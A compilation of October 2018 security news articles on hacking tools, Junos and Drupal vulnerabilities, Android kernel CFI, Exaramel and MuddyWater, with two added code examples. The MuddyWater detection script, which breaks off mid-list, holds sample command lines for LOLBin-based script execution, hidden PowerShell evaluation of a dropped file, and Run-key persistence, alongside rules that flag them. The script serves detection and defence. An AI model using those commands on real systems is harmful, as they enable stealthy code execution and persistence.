The RAT included in the report is JBiFrost, a variant of Adwind. The Five Eyes agencies have warned that while JBiFrost has been mostly used by low-skilled threat actors and cybercriminals, it can also be useful to state-sponsored groups.

JBiFrost works on Windows, Linux, macOS and Android, and its capabilities include lateral movement, installing additional malware, launching distributed denial-of-service (DDoS) attacks, and stealing information.

Agencies warned that JBiFrost has been increasingly used in targeted attacks aimed at critical infrastructure operators and their supply chain.

The web shell mentioned in the report is called China Chopper and it allows hackers to remotely access compromised servers. Widely used since 2012, the shell is only 4Kb in size and its payload is easy to modify, which makes it more difficult to detect.

China Chopper was used in the summer of 2018 in an attack that exploited an Adobe ColdFusion vulnerability tracked as CVE-2017-3066.

Another tool described in the report is Mimikatz, a popular open source application that has been around for more than a decade. Mimikatz has been used by many threat groups to steal passwords, including in the recent NotPetya and Bad Rabbit attacks.

Cybersecurity agencies have also warned of PowerShell Empire, a lateral movement framework released in 2015 as a legitimate penetration testing tool. PowerShell Empire allows attackers to elevate privileges, harvest credentials, log keystrokes, find nearby hosts, and move laterally across the network.

The tool was used in recent years in attacks aimed at the UK energy sector, South Korean organizations as part of a Winter Olympics-themed campaign, a multinational law firm, and academia.

The last hacking tool described in the report is HUC Packet Transmitter (HTran), which allows malicious actors to obfuscate communications. Hackers have been using it to evade detection, bypass security controls, obfuscate C&C traffic, and improve their C&C infrastructure.

"These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution," the report reads. "Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives."


Juniper Patches Serious Flaws in Junos OS
12.10.2018 securityweek
Vulnerability

Juniper Networks this week informed customers that its Junos operating system is affected by many serious vulnerabilities, including a flaw that may have been triggered during malicious network probing.

Juniper on Wednesday published nearly two dozen advisories describing security holes in Junos, the operating system that powers its networking and security products. The company has provided patches and mitigations for each of the vulnerabilities.

One of the more interesting issues is CVE-2018-0049, which allows an attacker to crash the Junos kernel by sending specially crafted MPLS packets. Juniper noted that a single packet can cause a denial-of-service (DoS) condition, but an attacker can launch a sustained DoS attack by continually sending malicious packets.

Juniper says that while it's not aware of instances where this vulnerability was specifically targeted by hackers, the company is aware of "possible malicious network probing which may have triggered this issue."

Juniper has assigned a "critical" risk level to several vulnerabilities affecting the NTP daemon. The Network Time Foundation recently patched several vulnerabilities, including ones rated "critical" and "high severity," and Juniper has now rolled out the fixes to its customers with Junos OS updates.

Juniper NFX series devices are affected by a critical flaw that can allow a remote attacker to gain access to the system through accounts with blank passwords. The company addressed the issue by not allowing empty passwords.

The list of Junos vulnerabilities that are close to critical – with a CVSS score of 8.8 – includes two vulnerabilities that can be exploited to crash the routing protocol daemon (RPD) and possibly for remote code execution.

Juniper has also disclosed the existence of several other severe RPD-related vulnerabilities that can be exploited to cause a DoS condition.

An update for the Junos Space Network Management Platform fixes several vulnerabilities, including ones considered "high risk."

Another serious DoS vulnerability has been found in the SIP application layer gateway (ALG) in Junos, which allows an attacker to crash various processes.

A "high risk" rating has also been assigned to a vulnerability in the RSH service that allows a remote and unauthenticated attacker to gain root access to affected devices.

A dozen of the advisories published this week by Juniper describe "medium risk" flaws that can be exploited for DoS and cross-site scripting (XSS) attacks.


Mozilla Delays Distrust of Symantec Certificates
12.10.2018 securityweek
Security

Mozilla this week announced that the distrust of older Symantec certificates, initially planned for Firefox 63, will be delayed.

Following a long series of problems regarding the wrongful issuance of certificates issued by the Certification Authority (CA) run by Symantec, one of the oldest and largest CAs, browser makers have decided to remove trust in all Symantec-issued certificates before the end of this year.

Both Google and Mozilla said they would gradually remove trust in all TLS/SSL certificates issued by Symantec. Google, which removed trust in certificates that Symantec issued before June 1, 2016, with the release of Chrome 66 in April, wants to remove trust in all Symantec certificates in Chrome 70.

Mozilla was aiming at making a similar move in October 2018, with the release of Firefox 63, but now says it has decided to delay the distrust plans. The browser is currently only warning users when encountering a website that uses a Symantec-issued certificate.

According to the browser maker, it took this decision after learning that well over 1% of the top 1,000,000 websites still use Symantec certificates, meaning that impact on users would be much greater than initially anticipated.

Last year, Symantec sold its CA business to DigiCert, which immediately started issuing new certificates to replace those issued by Symantec. In March, DigiCert said it had replaced most of the Symantec-issued certificates and that less than 1% of the top 1 million websites hadn’t made the switch yet.

As it turns out, many popular sites are still using Symantec certificates, apparently unaware of the planned distrust. Others, Mozilla says, are likely waiting until Chrome 70 arrives on October 23 to finally replace their Symantec certificates.

“Unfortunately, because so many sites have not yet taken action, moving this change from Firefox 63 Nightly into Beta would impact a significant number of our users. It is unfortunate that so many website operators have waited to update their certificates, especially given that DigiCert is providing replacements for free,” Mozilla’s Wayne Thayer notes.

He says that Mozilla is well aware of the additional risk caused by a delay in the implementation of the distrust plan, but also points out that the delay is in the best interest of Firefox users, given the current situation.

The distrust, however, continues to be planned for later this year, when more sites have replaced their Symantec TLS certificates. Firefox 63 Nightly is already distrusting Symantec-issued certificates, but the change will not be implemented in Firefox 63 Beta; it is now planned for Firefox 64 Beta instead.

“We continue to strongly encourage website operators to replace Symantec TLS certificates immediately. Doing so improves the security of their websites and allows the 10’s of thousands of Firefox Nightly users to access them,” Thayer concludes.


Audit Finds No Critical Flaws in Firefox Update System
12.10.2018 securityweek
Vulnerability

An audit commissioned by Mozilla for the Firefox update system revealed no critical vulnerabilities and the flaws rated "high severity" were not easy to exploit.

Experts at Germany-based X41 spent 27 days analyzing the Firefox Application Update Service (AUS), including its update signing protocol, client code, backend and other components. The audit involved a cryptographic review, fuzzing, pentesting, and manual code analysis.

X41's audit revealed 14 vulnerabilities, including three issues that based on their CVSS score would be rated as "high severity," seven "medium" and four "low" flaws. In addition, experts discovered 21 issues that have been described by Mozilla as "side findings," which are informational.

The most serious of the security holes are related to the use of JavaScript libraries with known vulnerabilities, the lack of validation for cross-site request forgery (CSRF) tokens, and the use of cookies without the "secure" flag. All of these problems affected the backend service that manages updates, which Mozilla has dubbed Balrog.

While these flaws may have normally posed a serious risk, Mozilla pointed out that the actual risk was lowered due to AUS being protected by multiple layers of authentication inside its internal network.

The audit also uncovered some bugs in the code that handles update files, but the cryptographic signatures implemented by Mozilla prevent threat actors from creating malicious update files.

Researchers also discovered some less serious denial-of-service (DoS) bugs, memory corruption issues, and insecure handling of data, but they noted that exploitation was prevented by the need to bypass crypto signatures.

"No issues were identified in the handling of cryptographic signatures for update files," X41 wrote in its report. "There were no cryptographic signatures on the XML files describing the update files’ location and other metadata. The files were downloaded via HTTPS, but the server certificates or public keys were not pinned."

Auditors noted that the number of informational bugs was "unusually high" and warned that these should be patched as well, as some of them could turn out to be exploitable and critical.

"In conclusion, the AUS showed good resistance against the actual exploitation of vulnerabilities," X41 said.

Mozilla has already patched the serious vulnerabilities and is currently working on addressing the less severe issues and the side findings. The organization has made public the full report from X41 and opened the bug tracker where the patching progress can be monitored.

This is not the first security audit commissioned by Mozilla. Last year it hired Cure53 to analyze the Firefox Accounts system.


Security Automation Firm Demisto Raises $43 Million
12.10.2018 securityweek
IT

Security Orchestration, Automation and Response (SOAR) firm Demisto has raised $43 million in a Series C funding round led by Greylock Partners. It brings the total raised by the Cupertino, California-based firm to date to $69 million, following a Series B round ($20 million) in February 2017.

The purpose of the new funding is to continue development of the SOAR product, and to help the firm expand into the EMEA and APAC markets. Sarah Guo, a general partner at Greylock, joins the Demisto board.

Demisto was founded in 2015 by Dan Sarel, Guy Rinat, Rishi Bhargava, and Slavik Markovich. They had decided that the market needed, not so much a new security control product, but a new product able to maximize use of existing products. "We asked a bunch of security executives and analysts, 'What is your biggest problem today?'" Bhargava told SecurityWeek. "All of them replied that the problem is operational -- they simply do not have the staff to handle the volume of alerts generated by existing products. This is the problem we decided to solve through automation and orchestration."

SOAR is a relatively new product category -- but its value is already recognized. At the end of 2017, Gartner published a report suggesting that the share of organizations with security teams larger than five people that will leverage SOAR tools for orchestration and automation will rise from less than 1% today to 15% in 2020. A few months later, in May 2018, Gartner listed Demisto as one of its 'cool' vendors for 2018.

"It is clear," continued Bhargava, "that security teams are focused on deploying the next best technology product -- whether that's at the perimeter, or in the cloud, or on the endpoint. But few security teams focus on the operational side of security." With an increasing number of attacks, a growing number of products, and an increasing volume of alerts, analyst teams are simply overwhelmed by their workload. The result, he suggested, is that for many firms the operational side of security is in disarray.

"We decided that first of all we needed to develop a robust automation and orchestration platform that can enable workflows (whether manual or automated or a combination) to automate the analyst's response; and that the platform needs to integrate with hundreds of security products. We currently integrate with around 220 different security products. Secondly, we needed a component that would provide a very strong ticketing, or case management, system, designed to manage the workload of the security teams. This would include clear escalation and assignment processes -- and would need to tie in with the response workflow. Thirdly, we wanted a collaboration workbench able to give analysts the ability to work with their peers; because most security teams in large organizations are distributed across different locations."

The key to the Demisto platform is the playbooks. These automate a consistent method, or progression of steps, needed to handle the different types of alert generated by the security control products. "The playbooks are not built around specific threats or exploits, but on the methods of exploitation," explained Bhargava. "So, if you get a new type of threat -- say ransomware -- you need to check the malware playbook to see if it handles the new threat. If the answer is no, then you need to tweak the playbook."

Tweaking can be done in-house or remotely via Demisto. "If a customer improves a playbook, it gets shared to the rest of the Demisto community of customer analysts. The playbook is defined as content and kept separate from the product. If the product gets updated by Demisto, the playbooks remain unchanged."

What this means is that the alert handling process is not merely automated, it is continually improved -- and perhaps most pertinently, that expertise doesn't walk out the door when the analyst moves on to a different company (which is currently about every two years).

"SOAR products," suggests Roland Cloutier, Global CSO at ADP, "occupy a unique place in the security, risk, and privacy landscape because they weave an actionable and operational thread across the incident management, security, and even business process workflows. Business Protection and Assurance Data without action is incomplete, and SOAR tools fill that gap by ingesting aggregated alerts and instantiating workflows that automate security and business actions across the product stack. This frees up analyst time, investigative time, reporting time, and helps security, risk, and privacy teams leverage their existing business protection and management technology investments, ensuring their business is more prepared."

In measurable terms, Bhargava pointed to one customer (ESRI) that used the SOAR platform and reduced the alerts needing human intervention from a high of 100,000 per week, to roughly just 500 per week.


Google Hardens Android Kernel
12.10.2018 securityweek
Android

Google this week revealed that Android’s kernel is becoming more resilient to code reuse attacks, courtesy of implemented support for LLVM’s Control Flow Integrity (CFI).

CFI support, Google says, was added to Android kernel versions 4.9 and 4.14 and the feature is available to all device vendors. However, Google Pixel 3, which was launched earlier this week, is the first device to take advantage of the new security mitigations.

One of the ways in which attackers achieve code execution without injecting executable code of their own, Google explains, is by abusing kernel bugs to overwrite a function pointer stored in memory. The method is popular against the kernel given the large number of function pointers it uses and the protections that already make code injection difficult.

CFI, however, was designed to mitigate these attacks through additional checks applied to the kernel's control flow. While this still allows an attacker to change a function pointer if a bug provides write access to one, it significantly restricts the valid call targets, thus making exploitation more difficult.

LLVM's CFI implementation also requires the use of Link Time Optimization (LTO), which in turn requires adopting LLVM's integrated assembler for inline assembly. The GNU toolchain, which the Linux kernel relies on for assembling, compiling, and linking the kernel, will continue to be used for stand-alone assembly code.

“LLVM's CFI implementation adds a check before each indirect branch to confirm that the target address points to a valid function with a correct signature. This prevents an indirect branch from jumping to an arbitrary code location and even limits the functions that can be called,” Google explains.
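The check Google describes, as a constructed C model added here (not Google's or LLVM's code): the per-type tables of valid targets and the pre-call check that the compiler normally emits are written by hand, and the `ioctl`/`cleanup` handler names are assumptions. It shows that a pointer overwritten to point at a function of another signature, or at a function never registered for that type, is refused before the indirect call happens.

```c
/* Constructed, simplified model of LLVM's forward-edge CFI check (not Google's
 * or LLVM's code). The compiler normally emits these checks and tables itself;
 * here they are written by hand so the mechanism is visible. */
#include <stddef.h>
#include <stdio.h>

#define CFI_VIOLATION (-100)   /* sentinel returned when a call is refused */

/* Two distinct function-pointer types, as a kernel driver interface might use
 * (assumed names). */
typedef int (*ioctl_handler_t)(unsigned int cmd);
typedef int (*cleanup_fn_t)(void);

static int ioctl_get_version(unsigned int cmd) { (void)cmd; return 3; }
static int ioctl_reset(unsigned int cmd)       { return cmd == 0 ? 0 : -1; }
static int release_resources(void)             { return 42; }
/* Same signature as an ioctl handler, but its address is never taken
 * legitimately, so the compiler would not list it as a valid target. */
static int ioctl_debug_dump(unsigned int cmd)  { return (int)cmd + 1000; }

/* LLVM CFI keeps, per function-pointer type, the set of address-taken
 * functions with exactly that signature. Constructed equivalents: */
static const ioctl_handler_t valid_ioctl_targets[]   = { ioctl_get_version, ioctl_reset };
static const cleanup_fn_t    valid_cleanup_targets[] = { release_resources };

/* The check inserted before an indirect call: is the target in the set for
 * this pointer type? Returns 1 if the call is allowed, 0 otherwise. */
static int cfi_check_ioctl(ioctl_handler_t target)
{
    size_t n = sizeof valid_ioctl_targets / sizeof valid_ioctl_targets[0];
    for (size_t i = 0; i < n; i++)
        if (valid_ioctl_targets[i] == target) return 1;
    return 0;
}

static int cfi_check_cleanup(cleanup_fn_t target)
{
    size_t n = sizeof valid_cleanup_targets / sizeof valid_cleanup_targets[0];
    for (size_t i = 0; i < n; i++)
        if (valid_cleanup_targets[i] == target) return 1;
    return 0;
}

/* Unprotected indirect call: whatever the pointer holds gets executed. */
static int dispatch_unprotected(ioctl_handler_t fn, unsigned int cmd)
{
    return fn(cmd);
}

/* CFI-protected indirect call: an out-of-set target is refused. The Android
 * kernel reports a CFI failure (and by default panics) instead of calling. */
static int dispatch_cfi(ioctl_handler_t fn, unsigned int cmd)
{
    if (!cfi_check_ioctl(fn)) {
        fprintf(stderr, "CFI failure: indirect call to non-ioctl target refused\n");
        return CFI_VIOLATION;
    }
    return fn(cmd);
}

/* A driver object whose function pointer lives in writable memory: the kind
 * of pointer the text says a kernel bug may overwrite. */
struct device_ops { ioctl_handler_t ioctl; };

/* Models the corrupted-pointer case: the stored ioctl pointer ends up pointing
 * at a function of a different signature. A plain assignment stands in for
 * the memory bug so the check's reaction can be observed. */
static int call_with_corrupted_pointer(void)
{
    struct device_ops ops = { ioctl_reset };
    ops.ioctl = (ioctl_handler_t)release_resources;   /* wrong signature */
    return dispatch_cfi(ops.ioctl, 0);                /* refused: CFI_VIOLATION */
}

/* Models the intact case: the pointer still holds a legitimate handler. */
static int call_with_intact_pointer(void)
{
    struct device_ops ops = { ioctl_reset };
    return dispatch_cfi(ops.ioctl, 0);                /* runs: returns 0 */
}

int main(void)
{
    printf("intact pointer    -> %d\n", call_with_intact_pointer());
    printf("corrupted pointer -> %d\n", call_with_corrupted_pointer());
    printf("unregistered fn   -> %d\n", dispatch_cfi(ioctl_debug_dump, 1));
    printf("unprotected call  -> %d\n", dispatch_unprotected(ioctl_get_version, 0));
    return 0;
}
```

The unregistered `ioctl_debug_dump` case is the "even limits the functions that can be called" part of Google's description: matching signature alone is not enough.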

Kernel modules, which are loaded at runtime and can be compiled independently from the rest of the kernel, add another complication to CFI, so Google implemented LLVM's cross-DSO CFI support in the kernel to ensure kernel modules are supported.

“When compiled with cross-DSO support, each kernel module contains information about valid local branch targets, and the kernel looks up information from the correct module based on the target address and the modules' memory layout,” Google explains.

The CFI checks add overhead to indirect branches, but the aggressive optimizations enabled by LTO mean that overall system performance even improves by 1-2% in many cases.

CFI for arm64, Google notes, requires clang version 5.0 and higher, as well as binutils 2.27 and higher. The LLVMgold.so plug-in should also be available in LD_LIBRARY_PATH. Google has already added pre-built toolchain binaries for clang and binutils in AOSP, but says that upstream binaries can also be used.

The use of CFI comes with its own pitfalls, such as violations caused by function pointer type mismatches, of which Google has encountered plenty. Address space conflicts could also arise, and CFI can also be tripped by memory corruption errors that would normally result in random kernel crashes.

“If you are shipping a new arm64 device running Android 9, we strongly recommend enabling kernel CFI to help protect against kernel vulnerabilities. LLVM's CFI protects indirect branches against attackers who manage to gain access to a function pointer stored in kernel memory. This makes a common method of exploiting the kernel more difficult,” Google says.

The tech giant also plans on protecting function return addresses from similar attacks with the help of LLVM's Shadow Call Stack. This change, however, will be available in an upcoming compiler release.


Hackers Exploit Drupalgeddon2 to Install Backdoor
12.10.2018 securityweek
Exploit

A threat actor was observed targeting Drupal vulnerabilities patched earlier this year to install a backdoor on compromised servers, IBM reports.

The hackers target CVE-2018-7600, or Drupalgeddon2, a critical vulnerability found to impact Drupal versions 6, 7 and 8, but which was addressed in March this year. Assigned a risk score of 21/25, the vulnerability could be exploited to gain full control over a site, including access to non-public data.

Within weeks after a patch was released and the vulnerability became public, the first attempts to exploit it were observed. Soon after, while cybercriminals were targeting vulnerable sites with backdoors and crypto-miners, Drupal patched another highly critical flaw related to Drupalgeddon2.

Now, IBM’s security researchers reveal that both vulnerabilities are being targeted in a series of attacks that appear to be part of a financially-motivated campaign aiming at mass-infecting vulnerable Drupal websites. Although both security bugs have been patched, delays in applying fixes make them persistent.

The researchers observed that the same HTTP POST request was being repeatedly sent from the same IP address, which then revealed similar traffic from multiple command-and-control (C&C) servers. Part of a widespread cyber-attack, the requests would download a Perl script to launch the Shellbot backdoor.

The Shellbot malware would connect to an Internet Relay Chat (IRC) channel and use it to receive instructions. The bot contains functionality to perform distributed denial-of-service (DDoS) attacks, as well as to scan for SQL injection weaknesses and other vulnerabilities, in an attempt to reach root level on the victimized system.

“The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well,” IBM notes.

Around since 2005, Shellbot was designed to open remote command line shells, launch DDoS attacks, run tasks and processes, download additional files onto the infected system, and change the endpoint’s settings, among other things.

Although old, Shellbot is being used by several threat groups, and the security researchers observed it last year in attacks targeting an Apache Struts vulnerability (CVE-2017-5638) as well, when it was packaged as the C&C with the PowerBot malware, which dropped crypto-mining modules.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Facebook Purges 251 Accounts to Thwart Deception
12.10.2018 securityweek
Social

Facebook on Thursday said it shut down 251 accounts for breaking rules against spam and coordinated deceit, some of it by ad farms pretending to be forums for political debate.

The move came as the leading social network strives to prevent the platform from being used to sow division and spread misinformation ahead of US elections in November.

Facebook removed 559 pages and 251 accounts that consistently violated rules against spam and "coordinated inauthentic behavior," according to an online post by cybersecurity policy chief Nathaniel Gleicher and product manager Oscar Rodriguez.

"Many were using fake accounts or multiple accounts with the same names and posted massive amounts of content across a network of Groups and Pages to drive traffic to their websites," they said.

"Many used the same techniques to make their content appear more popular on Facebook than it really was."

Other pages and accounts shut down were "ad farms" using Facebook to trick people into thinking they were forums for legitimate political debate, according to Gleicher and Rodriguez.

Facebook is getting a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections in the US and Brazil.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

Facebook is keen to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election that brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said recently in a post on the social network.

Facebook has started showing who is behind election-related online ads, and has shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to the social network.


Exaramel Malware Links Industroyer ICS malware and NotPetya wiper
12.10.2018 securityaffairs
Ransomware

ESET researchers have spotted a new strain of malware tracked as Exaramel that links the dreaded NotPetya wiper to the Industroyer ICS malware.
A few months ago, researchers from ESET discovered a new piece of malware that further demonstrates the existence of a link between Industroyer and the NotPetya wiper.

In June 2017, researchers at antivirus firm ESET discovered a new strain of malware, dubbed Industroyer, that was designed to target power grids.

Industroyer was involved in the December 2016 attack aimed at an electrical substation in Ukraine that caused significant power outages.

Industroyer is the fourth malware specifically designed to target ICS systems; the threats previously discovered by security experts are Stuxnet, BlackEnergy, and Havex.

Now experts found a link between the 2016 Industroyer attack and Russia-linked APT groups tracked as BlackEnergy, TeleBots, Sandworm, and Electrum.

“That said, we have observed and documented ties between the BlackEnergy attacks – not only those against the Ukrainian power grid but against various sectors and high-value targets – and a series of campaigns (mostly) against the Ukrainian financial sector by the TeleBots group.” reads the analysis published by ESET.

“In June 2017, when many large corporations worldwide were hit by the Diskcoder.C ransomware (aka Petya and NotPetya) – most probably as unintended collateral damage – we discovered that the outbreak started spreading from companies afflicted with a TeleBots backdoor, resulting from the compromise of the popular financial software M.E.Doc.”


The NotPetya wiper was linked by experts to BlackEnergy and to the KillDisk malware that was used in the 2015 attack in Ukraine.

In April 2018, ESET discovered a new backdoor tracked as Exaramel that definitively links Industroyer to TeleBots.

Researchers noticed that the XML-formatted configuration data the Exaramel dropper writes to the Windows registry records which security solution is installed on the compromised system, something Industroyer also did.

“the attackers are grouping their targets based on the security solutions in use. Similar behavior can be found in the Industroyer toolset – specifically some of the Industroyer backdoors were also disguised as an AV-related service (deployed under the name avtask.exe) and used the same grouping.” continues the analysis.

Experts also found many similarities between the code that implements the commands in Exaramel and a backdoor from the Industroyer toolset.

Both backdoors rely on a report file to store the output of executed shell commands and launched processes.

The main difference between the backdoor from the Industroyer toolset and the Exaramel backdoor is that the latter uses XML format for communication and configuration instead of a custom binary format.

“Along with the Exaramel backdoor, Telebots group uses some of their old tools, including a password stealer (internally referred as CredRaptor or PAI by the attackers) and a slightly-modified Mimikatz.” continues the analysis.

“The CredRaptor custom password-stealer tool, exclusively used by this group since 2016, has been slightly improved. Unlike previous versions, it collects saved passwords not only from browsers, but also from Outlook and many FTP clients.”

ESET observed only one attack based on Exaramel, against an organization in Ukraine; the experts also discovered a Linux variant of the backdoor, tracked as Linux/Exaramel.A.

“The discovery of Exaramel shows that the TeleBots group is still active in 2018 and the attackers keep improving their tools and tactics.” concludes ESET.

“The strong code similarity between the Win32/Exaramel backdoor and the Industroyer main backdoor is the first publicly presented evidence linking Industroyer to TeleBots, and hence to NotPetya and BlackEnergy. While the possibility of false flags – or a coincidental code sharing by another threat actor – should always be kept in mind when attempting attribution, in this case we consider it unlikely.”


Juniper Networks provides dozens of fixes for vulnerabilities in Junos OS

12.10.2018 securityaffairs Vulnerability

Juniper Networks has released security updates to address serious vulnerabilities affecting the Junos operating system.
This week, Juniper Networks patched dozens of serious security flaws in Junos OS and related products; a security advisory for each of them is available on the company website.

The most severe flaw is probably CVE-2018-0049, which could be exploited by an attacker to crash the Junos kernel by sending specially crafted MPLS packets.

Juniper reported that a single specially crafted MPLS packet is enough to trigger a DoS condition, and that continued receipt of such packets keeps the device down.

“A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS allows an attacker to cause the Junos OS kernel to crash. A single packet received by the target victim will cause a Denial of Service condition. Continued receipt of this specifically crafted malicious MPLS packet will cause a sustained Denial of Service condition.” reads the security advisory.

As a workaround, the company suggests removing the MPLS configuration stanza from interfaces at risk.

At the time the patch was released there were no reports of exploitation in the wild; however, Juniper is aware of “possible malicious network probing which may have triggered this issue.”

Another severe flaw fixed by Juniper, affecting NFX series devices, could be exploited by a remote attacker to gain access to the system through accounts with blank passwords.

The patch provided by the company no longer allows empty passwords.

Juniper also provided fixes for several vulnerabilities affecting the NTP daemon, and addressed several flaws in the routing protocol daemon (RPD), most of which could be exploited to cause a DoS condition.

Two of the RPD issues could be exploited to crash the daemon and potentially allow remote code execution.

Looking at the list of advisories, we also find a fix for a high-risk vulnerability in the Junos Space Network Management Platform and for a DoS flaw in the SIP application layer gateway (ALG) in Junos; the latter could be exploited by an attacker to crash several processes.

The company also fixed a high-risk flaw in the RSH service that could allow a remote, unauthenticated attacker to gain root access to affected devices.

Dozens of DoS and XSS flaws rated as “medium risk” were fixed as well.


MuddyWater Threat Actor Expands Targets List
11.10.2018 securityweek
CyberSpy

The MuddyWater cyber-espionage campaign was observed using spear-phishing emails to target entities in more countries, Kaspersky Lab reports.

The MuddyWater threat actor was first detailed last year, focusing mainly on governmental targets in Iraq and Saudi Arabia. Attribution appears difficult and numerous new attacks were linked to the group this year.

Recently, the group was observed targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan. Other victims were detected in Mali, Austria, Russia, Iran, and Bahrain, and the initially discovered attacks on Iraq and Saudi Arabia continued as well.

The attacks used new spear-phishing documents and relied on social engineering to trick users into enabling malicious macros. Password-protected to hinder analysis, the macros in the malicious documents execute obfuscated VBA code when enabled.

The Base64-encoded macro payload drops three files in the “ProgramData” folder and also adds a registry entry in the current user’s Run key (under HKCU) to ensure execution when the user next logs in. Sometimes the macro spawns the malicious payload immediately rather than waiting for the next login.

The attacks leverage legitimate executables from Microsoft, all of which are whitelisted, thus ensuring the payload’s execution. The macro drops either INF, SCT, and text files or VBS and text files.

In the first scenario, the INF file is launched via the advpack.dll “LaunchINFSection” function to register the SCT file (a scriptlet file) via scrobj.dll (the Microsoft Scriptlet library). Next, JavaScript or VBScript code in the SCT file uses WMI (winmgmt) to spawn a PowerShell one-liner that consumes the text file.

In the second scenario, the VBS file decodes itself and calls mshta.exe. A single line of VBScript passed to mshta spawns a PowerShell one-liner that consumes the text file.

The PowerShell one-liner reads the encoded text file dropped in ProgramData and decodes it into obfuscated code.

The code disables the Macro Warnings and Protected View in Office, to ensure future attacks can be performed without user interaction. It also checks the running processes against a hardcoded list and reboots the machine if it finds any match.

For communication with the command and control (C&C) server, the code randomly selects a URL from a list. If communication fails, it attempts to connect to another randomly selected URL from that list, then sleeps from one to 30 seconds and loops again.

Once a machine has been infected, the code attempts to obtain the victim’s public IP and sends the information along with OS version, internal IP, machine name, domain name, and username to the C&C, which allows the attackers to filter victims.

Based on commands received from the C&C, the code can take screenshots, retrieve another stage of the PowerShell code that is executed via Excel, Outlook, or Explorer.exe, download files from the C&C and save them to “ProgramData,” destroy the disk drives C, D, E, F and then reboot the system, or simply reboot or shut down the victim’s machine.
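The chain described above (Office macro, INF/SCT or VBS stage, WMI- or mshta-spawned PowerShell reading a file under ProgramData, Run-key persistence, and the Office security downgrade) is what an endpoint rule set should be looking for. The following Python is an added example, not code from Kaspersky's report or from the MuddyWater toolset: it runs a handful of detection rules over Sysmon-style process-creation and registry events. The sample events, the exact command lines, the Office registry values it watches (VBAWarnings, ProtectedView\Disable*) and the function names (process_rules, registry_rules, evaluate) are this example's own assumptions about how the chain appears in telemetry, not indicators taken from the report.

```python
"""Detection logic for a MuddyWater-style macro-to-PowerShell chain.
Sample telemetry is constructed for this example; the command lines and
registry values are assumptions about how the chain appears on an endpoint."""
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe"}


def process_rules(e):
    """Yield the names of rules matched by one process-creation event."""
    img, par, cmd = e["image"].lower(), e["parent"].lower(), e["cmdline"].lower()
    # Scenario 1: rundll32 advpack.dll,LaunchINFSection <inf> runs the INF,
    # which registers the scriptlet through regsvr32 ... scrobj.dll.
    if img == "rundll32.exe" and "advpack.dll" in cmd and "launchinfsection" in cmd:
        yield "inf_via_advpack"
    if img == "regsvr32.exe" and "scrobj.dll" in cmd:
        yield "scriptlet_via_scrobj"
    # Scenario 2: mshta executes an inline vbscript:/javascript: URI.
    if img == "mshta.exe" and re.search(r"(vbscript|javascript):", cmd):
        yield "mshta_inline_script"
    # The SCT starts PowerShell through WMI, so its parent is WmiPrvSE.
    if img == "powershell.exe" and par == "wmiprvse.exe":
        yield "wmi_spawned_powershell"
    # The one-liner reads and evaluates the dropped file under ProgramData.
    if (img == "powershell.exe" and "\\programdata\\" in cmd
            and re.search(r"\biex\b|invoke-expression|frombase64string", cmd)):
        yield "powershell_consumes_programdata_file"
    # Office applications normally never start script hosts at all.
    if par in OFFICE and img in LOLBINS:
        yield "office_spawned_lolbin"


def registry_rules(e):
    """Yield the names of rules matched by one registry value-set event."""
    key, value, data = e["key"].lower(), e["value"].lower(), str(e["data"]).lower()
    if key.endswith("\\currentversion\\run") and "\\programdata\\" in data:
        yield "run_key_into_programdata"
    # HKCU\Software\Microsoft\Office\<ver>\<app>\Security\VBAWarnings = 1 means
    # "enable all macros"; ProtectedView\Disable* = 1 turns the sandbox off
    # (assumed targets of the macro's "disable warnings" step).
    if (re.search(r"\\office\\\d+\.\d+\\\w+\\security$", key)
            and value == "vbawarnings" and data == "1"):
        yield "office_macro_warnings_disabled"
    if "\\security\\protectedview" in key and value.startswith("disable") and data == "1":
        yield "office_protected_view_disabled"


def evaluate(events):
    """Return {rule_name: [event indexes]} for every rule that fired."""
    hits = {}
    for i, e in enumerate(events):
        rules = process_rules(e) if e["type"] == "process" else registry_rules(e)
        for name in rules:
            hits.setdefault(name, []).append(i)
    return hits


# Constructed sample telemetry: both delivery scenarios, the persistence and
# Office-hardening changes, followed by two benign events that must not fire.
SAMPLE_EVENTS = [
    {"type": "process", "image": "rundll32.exe", "parent": "WINWORD.EXE",
     "cmdline": r"rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\update.inf,DefaultInstall,1"},
    {"type": "process", "image": "regsvr32.exe", "parent": "rundll32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:C:\ProgramData\update.sct scrobj.dll"},
    {"type": "process", "image": "powershell.exe", "parent": "WmiPrvSE.exe",
     "cmdline": r"powershell.exe -w hidden -c iex([IO.File]::ReadAllText('C:\ProgramData\update.txt'))"},
    {"type": "process", "image": "mshta.exe", "parent": "wscript.exe",
     "cmdline": 'mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe -w hidden"",0:close")'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Update", "data": r"wscript.exe C:\ProgramData\update.vbs"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Office\16.0\Word\Security",
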